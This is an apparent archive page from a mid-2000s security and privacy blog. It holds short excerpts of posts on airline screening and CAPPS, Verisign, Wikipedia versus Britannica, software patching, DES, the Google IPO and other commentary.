Abdul Hadi al-Khawaja is being detained for 45 days over charges of inciting hatred against the [Bahrain] regime. His Bahrain Centre for Human Rights (BCHR) ignored warnings it had contravened association laws, a government statement said. The centre had protested at the arrest, saying Mr Khawaja was just “practising his basic rights, namely free speech”. […]

 

"Tomorrow is Zero Hour"

More than 120,000 hours of potentially valuable terrorism-related recordings have not yet been translated by linguists at the Federal Bureau of Investigation, and computer problems may have led the bureau to systematically erase some Qaeda recordings, according to a declassified summary of a Justice Department investigation that was released on Monday. The problems, unsurprisingly, are […]

 

The Two 9/11 Commisson Reports

I’ve just finished the 9/11 commission’s report. (Or use the Pdfhack version, a fine example of what can be done in the absence of copyrights.) One of the things that stands out for me is the stark contrast between the history and the recommendations. The history is excellent. The recommendations, less so. My largest critique […]

 
 

Appreciating Shakespeare

Recently, I found myself wondering why Hamlet had never gotten a proper treatment in Powerpoint. After another drink, I took it apon myself to remedy the situation.

 

"You will eventually be caught"

I believe that if you are a low- to mid-skilled intruder physically located in the United States, you will eventually be caught. The days when hardly anyone cared about prosecuting digital crime are ending. The FBI has 13 Computer Hacking and Intellectual Property (CHIPS) units with plans to open more. The Computer Crime and Intellectual […]

 

Firefox Software Install UI

his changed recently — spyware ‘toolbars’ started to appear for Firefox as well. It was quite a surprise to see a dialog pop up when accessing an otherwise normal-looking (though advertising-heavy) page, using my Linux desktop, prompting me to install some ‘toolbar’ .xpi file! Firefox 1.0PR now includes code to deal with this. Here’s how […]

 

Airport Screening Still Fails Tests

Do current security plans depend on no guns getting onto the planes? I hope not. Covert government tests last November showed that screeners were still missing some knives, guns and explosives carried through airport checkpoints, and the reasons involve equipment, training, procedures and management, according to a report by the inspector general of the Homeland […]

 

Verisign's Kid Credentials

So Verisign has teamed up with I-safe to issue “USB tokens” to children. The ZDnet story states that it “will allow children to encrypt e-mail, to access kid-safe sites and to purchase items that require a digital signature, said George Schu [A Verisign VP].” To me that sounds a lot like an X.509 certificate, which […]

 

What's In A Name?

“BRANSON, Mo. – A Branson man has put a face to the anonymous references people often make to “they” by changing his name to just that: “They.” Not only is he making a statement about his name, but he’s messing with the entire English language,” friend Craig Erickson said. How can you argue with messing […]

 

"Post-Totalitarian Stress Disorder"

This – the damage done to individual psyche – and not just to the physical infrastructure and institutions of the country, is what we have to always keep in mind when assessing the progress of reconstruction and democratisation in places like Iraq. If things aren’t moving ahead as fast as expected, if cooperation is lacking […]

 

Acceptable ID

Virginia Postrel writes about flying without ID: Coming home today from New York, I was a little more prepared. I still didn’t have “government-issued i.d.,” but at least I knew I was headed for trouble. I got to JFK several hours early. The young security guard wasn’t sure what to do with me and asked […]

 

account.management@gmail.com

So when Google Mail started up, I managed to register “account.management@gmail.com.” I didn’t have any particular plan for this, I just figured that it was entertaining, and a good, harmless prank could be made of it. (I specifically emailed a friend who works for Google security about it, and mentioned it in person next time […]

 

"All Persons Held As Slaves Shall Be Forever Free"

Happy Emancipation Proclamation Day! On Sept 22, 1862, President Lincoln issued the Emancipation Proclamation: “…all persons held as slaves within any State or designated part of a State the people whereof shall then be in rebellion against the United States shall be then, thenceforward, and forever free; Now, like many government proclamations, there was more […]

 

Testing Airline Data for …what?

The New York Times reports that “The Transportation Security Administration said Tuesday that it planned to require all airlines to turn over records on every passenger carried domestically in June, so the agency could test a new system to match passenger names against lists of known or suspected terrorists.” The data will vary by airline. […]

 

Iraqis Target Forigners

Omar writes about A group of Iraqi citizens in Al Karkh/ Khidr Al Yas arrested 6 Syrian terrorists after placing a land mine at the gate of Bab Al Mu’a dam bridge from Al Karkh side. According to New Sabah newspaper, after a road side bomb exploded missing an American convoy that was patrolling in […]

 
 

CAPPS as Corporate Welfare

I’ve written in the past about how government-validated ID acts as a subsidy to privacy invasion. In the absence of such a card, I can give you whatever name I want, protecting my privacy. With such a card, it becomes easy to invade people’s privacy. Under CAPPS-2, the government would like the airlines to collect […]

 

Testing Airline Customers

Ed Hasbrouck has another pair of good posts (1, 2) on the “Free Wheelchairs” program. In the first one, he quotes from “Department of Homeland Security Appropriations Act, 2005”, H.R. 4567: (2) the underlying error rate of the government and private data bases that will be used both to establish identity and assign a risk […]

 

New York Protests

Eugene Volokh rightly criticizes a corespondent for his ad-hominum attacks on NYC Mayor Bloomberg, who said (I’m quoting Volokh): But Bloomberg insisted that there’s no proof that the NYPD did anything wrong. “There is absolutely no evidence whatsoever that there was any intent by any law-enforcement official to hold people any longer than was absolutely […]

 

AT&T Wireless time service

I have cell service with AT&T wireless. One feature of the service is network time updates. It fortunately includes a confirmation. It’s great when you land in a new city. It hasn’t been so great last night or today. Last night, at 23.20, I got an update telling me that the new time was 21.15. […]

 
 

Jefferson Nickels

Samablog points to the new nickel design which will have either a buffalo or a depiction of the pacific coast on the back. The buffalo refers to the Louisiana Purchase, while the pacific coast refers to Lewis and Clark’s expedition . Despite his careers as a lawyer, diplomat, Secretary of State, and President of the […]

 

Free gropes for travellers

Over at BoingBoing, Cory points to a USA Today story at NewsIsFree about more screening. There seem to be four components: Explosives Detection Secondary screening will now always include nitrate detection swabbing. This is a fine step, but why has it taken 3 years to come in? (In fact, every time I’ve been thrown into […]

 

Qui Custodes Custodiat?

There’s a brilliant post over at Orcinus about the 9/11 commission, whose (outstanding) report I’m just getting around to reading. Really, if the Kerry campaign is serious about persuading the American public that Bush is a serious liability when it comes to securing the nation from the terrorist threat, this should be Exhibit A: Bush […]

 

Ian Grigg on Verisign

Ian Grigg has some very interesting comments on Verisign’s certificate business and what it means for privacy, over at Financial Cryptography

 

Bin Laden Unit downsided?

The New York Times reports: he Central Intelligence Agency has fewer experienced case officers assigned to its headquarters unit dealing with Osama bin Laden than it did at the time of the attacks, despite repeated pleas from the unit’s leaders for reinforcements, a senior C.I.A. officer with extensive counterterrorism experience has told Congress. A senior […]

 

Mozilla Patches

The Mozilla folks have awarded their first bug bounty payments for 14 security issues. Time to upgrade!

 

Microsoft JPG Bug, Patch, Tool

Microsoft has released a critical advisory (or, less-technical version) regarding a problem with the way JPEG files are parsed. Microsoft has released patches for their applications, and also a tool to scan for vulnerable apps. I’m not sure what to think about the tool. On the one hand, good for them! Helping customers secure their […]

 

Apple Security Updates

Apple has released an updated Security Advisory, to fix two problems introduced in the previous rev. Not a big deal, unless you happened to be trying to deal with their ftpd. As we’ve pointed out (PDF) in the past, security updates are a race between attacks and defense, and there are trade-offs you can make. […]

 

Holy Lousy Security, Batman!

Britons seemed startled by the ease with which palace security was overrun by two men in super hero costumes carrying an extension ladder….Police used a crane to extract him from the ledge as his supporters chanted “free Batman” from behind a police cordon. From the New York Times story. Or, Google News has more. The […]

 

With so many planes, it had to happen

This is a remarkably cool shot, which SteveC asserts is a plane flying in front of “The ULO telescope as it observes the transit of Venus.” I started asking what are the odds, and then ended up at a back of the envelope, why are these so rare?

 

"Want more Secure Software?"

SecurityFocus points to a nice short article over at Silicon.com suggests that Gartner advises that for companies building their own software, developers should be pushed to put security at the head of their list. It’s not just in-house tech makers that need a word in their ears – the analysts suggest end users should give […]

 

Mathematical Classifications

Mathematicians use a scheme called the Mathematics Subject Classification, (MSC) which includes a “how to use“, as well as a long history of being revised to reflect changes in the field, and I would guess, practice in how to effectively classify things. It has a General and Miscellaneous Topics section, too. Articles must be given […]

 

Canadian Health Care

The New York Times reports on a lack of doctors in Canada, along with a rise in Canadians using emergency rooms to replace family doctors. (Use BugMeNot if you don’t want to register.) The basic problem is economic. Doctors are much better paid in the US than in Canada, and doctors can easily move. Its […]

 

Shih shih…

The great linguist Chao Yuen-Ren once wrote an essay in Chinese using only words which (in Mandarin) would be transliterated as shih (using Wade-Giles; shi in pinyin). You can see the text in characters and two transliterations, read the translation (“A poet by the name of Shih Shih living in a stone den was fond […]

 

Bluetooth and phone security

Some Singaporean students have figured out how to use Bluetooth to turn off the cameras in Nokia’s phones, according to an article in Gizmodo, via a long chain to a now deleted newspaper article. I wonder if they turn it back on when you leave the area? However, Loosewire, the earliest still working link, implies […]

 

Airline "security"

The Webflyer points to a great David Rowell column, including: An argument ensued. Ms O’Leary not unreasonably thought it unfair to be trapped on the delayed flight when there was another flight due to leave shortly that she could make if allowed to leave the United Express flight. The pilot called the police who arrested […]

 

Swire on Disclosure

Peter Swire has a new working draft A Model For When Disclosure Helps Security. Its a great paper which lays out two main camps, which he calls open source and military, and explains why the underlying assumptions cause clashes over disclosure. That would be a useful paper, but he then extends it into a semi-mathematical […]

 

"Four More Pretzels?"

Over at American Spectator, Shawn Macomber writes about being arrested in New York this week, and suggests a reality TV show is in order: It could be called POWDERKEG! Each week, I’ll be arrested without my rights being read to me and held for 14 hours while police refuse to tell me what charges I’m […]

 

Taxonomies are hard

Responding to my earlier comments about science being easier at a distance, both Nude Cybot and Justin Mason have offered up substantial and useful comments on the subjects of biological taxonomies. (Justin’s have moved to email.) “Classification in Biology, or phylogenetics, is fraught with issues that we typically do not face when creating our own […]

 

Free Wheelchairs for Paraplegic Children

If you ever saw Julia Child or Jacques Pepin take apart a chicken, you’ll remember how easy they made it look. It’s a level of skill that we can all aspire to. Watching Ed Hasbrouck take apart the latest incarnation of free wheelchairs for paraplegic children is like watching Julia Child take apart a chicken. […]

 

Wikipedia vs Britannica tested

In Wikipedia vs. Britannica Smackdown, Ed Felten takes my challenge. In the meanwhile, I’d done some hypothesizing, here. So how’d I do? Hypothesis 1 is spot on. #2 is more challenging to assess: The errors in Britannica are smaller, and I think I’ll judge myself wrong. #3 I think is accurate, if only because of […]

 

Wikipedia vs Britannica

A few days ago, I challenged Ed Felten to do some more comparison work. In the spirit of Milgram, I didn’t propose a theory. (This was mostly because I was trying to make a good joke about assigning the professor homework, but couldn’t come up with one.) However, on consideration, I think that I should […]

 

Science is easier from the outside

As part of a larger project on security configuration issues, I’m doing a lot of learning about taxonomies and typographies right now. (A taxonomy is a hierarchical typography.) I am often jealous of the world of biology, where there are underlying realities that can be used for categorization purposes. (A taxonomy needs a decision tree. […]

 

Volokh commentary

this post by Todd Zywicki clearly illustrates the difference between law professors and economics professors.

 

Airline Security

In Educated Guesswork, Eric Rescorla writes about one way tickets and the search criteria. The CAPPS program was created by Northwest airlines, who set the criteria for inclusion. They included one way tickets to enforce their bizarre pricing schemes. This is the same reason they started asking for ID: to cut down on the resale […]

 

Wikipedia

Over at Freedom To Tinker, Ed Felten writes about the Wikipedia quality debate. He takes a sampling of six entries where he’s competent to judge their quality, and assesses them. Two were excellent, one was slightly inaccurate, two were more in depth, but perhaps less accessible than a standard encyclopedia, and one (on the US […]

 

Lock 'em up!

Over at TaoSecurity, Richard writes: Remember that one of the best ways to prevent intrusions is to help put criminals behind bars by collecting evidence and supporting the prosecution of offenders. The only way to ensure a specific Internet-based threat never bothers your organization is to separate him from his keyboard! Firstly, I’m very glad […]

 

The Man Who Shocked the World

I’ve recently finished The Man Who Shocked the World, a biography of Stanley Milgram. The book’s title refers to the “Authority Experiments,” wherein a researcher pressured a subject to deliver shocks to a victim. The subjects of the experiments, despite expressing feelings that what they were doing was wrong, were generally willing to continue. Other […]

 

Unrecoverable Damage?

I’m reading through NIST SP-800-70 (pdf), the NIST guide to producing security configuration guides. Let me get more coffee before I continue. Thanks for waiting. “If home users and other users without deep security expertise attempt to apply High Security checklists to their systems, they would typically experience unwanted limitations on system functionality and possibly […]

 

Lewis Carroll

Or, if you prefer, the original can be found elsewhere. It’s always nice when things I want to abuse like that are in the public domain. (Obligatory Lessig link.) But beyond that, think how much poorer literature in the computer science field would be if we didn’t have Alice In Wonderland to freely quote from, […]

 

Self-referential nonsense

“The time has come,” the Walrus said, “To talk of many things: Of shoes–and ships–and sealing-wax– Of cabbages–and kings– And why the sea is boiling hot– And whether pigs have wings.” “But wait a bit,” the Oysters cried, “Before we have our chat; For some of us are out of breath, And all of us […]

 

Olympic Security

Bruce Schneier has written insightfully about Olympic security. They’ve spent $1.5 billion, and today’s marathon race was marred by some idiot leaping into the path of the front-runner, and dragging him into the crowd. Its always tempting, and usually wrong, to say that any failure of security could be prevented. However, this Olympics has seen […]

 

In memory of Frank Sanache

Frank Sanache was one of eight Meswaski code talkers. He served in North Africa, and was captured by the Germans. I’m fairly interested in the history of code talkers, and had missed the Army’s use of them. It turns out that there were codetalkers in the First World War, that German civilains had travelled to […]

 

Bea Arthur, Terrorist

Beatrice Arthur, who apparently enjoys a little politics along with her fame, got irked at the airport police: “She started yelling that it wasn’t hers and said ‘The terrorists put it there,’ ” a fellow passenger said. “She kept yelling about the ‘terrorists, the terrorists, the terrorists.’ ” After the blade was confiscated, Arthur took […]

 

About those insiders

Over at TaoSecurity, Richard writes about a new report from CERT/CC and the Secret Service, studying “23 incidents carried out by 26 insiders in the banking and finance sector between 1996 and 2002.” I’m very glad that they’re doing this. I think that actually studying how bad guys carry out attacks is critical for defending […]

 

Hands off my bag!

The fine folks at handsoffmybag.com have the first set of their tote bags emblazoned with the 4th ammendment, and are shipping! Get yours before they’re outlawed!

 

Is Disabling Javascript a Win?

(Dave asked in a comment.) Yes, disabling Javascript is a win. Here’s an IE issue, and here’s one for Mozilla. Now, using Javascript, when its on, to reduce the number of clicks a user needs to make is a fine thing. I’m in favor of it. (Although I often find myself in misselect hell, when […]

 

Shut down these shadowy groups?

“The president said he wanted to work together (with McCain) to pursue court action to shut down all the ads and activity by the shadowy … groups,” White House spokesman Scott McClellan told reporters Shadowy? What’s shadowy about free speech? There’s a very bad law in place which restricts your ability to spend your money […]

 

XP SP2

So Microsoft has released XP2 on a CD. I’m not currently running any Windows machines, but I figure hey, this is an important patch, and I should be able to foist it on people. So I go to Microsoft’s Order a CD site. I am curious to see what else the CD might contain. A […]

 

Patch Management

Alec Muffet comments on sysadmin resistance to applying patches. As Steve Beattie and a bunch of others of us wrote about the issue is that there’s a tradeoff to be made to find the optimal uptime for a system. Its a tradeoff between a security risk and an operational risk. Organizationally, different teams are often […]

 

That exalted state

“The Central Intelligence Agency is committed to protecting your privacy and will collect no personal information about you unless you choose to provide that information to us.” Of course, this just goes to show that “We’re committed to protecting your privacy” has finally made it to the exalted and hard-to-reach level of “Of course I’ll […]

 

Secret Laws Work So Well

So it seems that two members of Congress have now been added to “watch lists.” “[Representative John] Lewis contacted the Department of Transportation, the Department of Homeland Security and executives at various airlines in a so-far fruitless effort to get his name off the list, said spokeswoman Brenda Jones.” It seems that this sort of […]

 

Time for DES to go?

In 1977, the government certified the Data Encryption Standard (DES), with a planned lifetime of 15 years. It has now been in use for nearly 30, and no longer offers even decent security. Over 6 years ago, the EFF built Deep Crack a supercomputer for breaking DES, which cracked keys in under a day. NIST […]

 

Why did Google pop? (II)

According to David Garrity, a technology analyst in New York with Caris & Co.: It was supposed to democratize the process and let people buy in at just a few shares, but it was a miserable failure because the organizers didn’t realize the securities regulations that require people who bid to have a certain net […]

 

Why did Google pop?

So Google popped 18% today. That shouldn’t have happened. The goal of their much-discussed auction was to ensure that they made money. The typical bubble IPO involved a “pop” of as much as 100-300% on opening day. This put huge sums in the hands of bankers and the bankers friends, sometimes illegally. Ideally, Google’s trading […]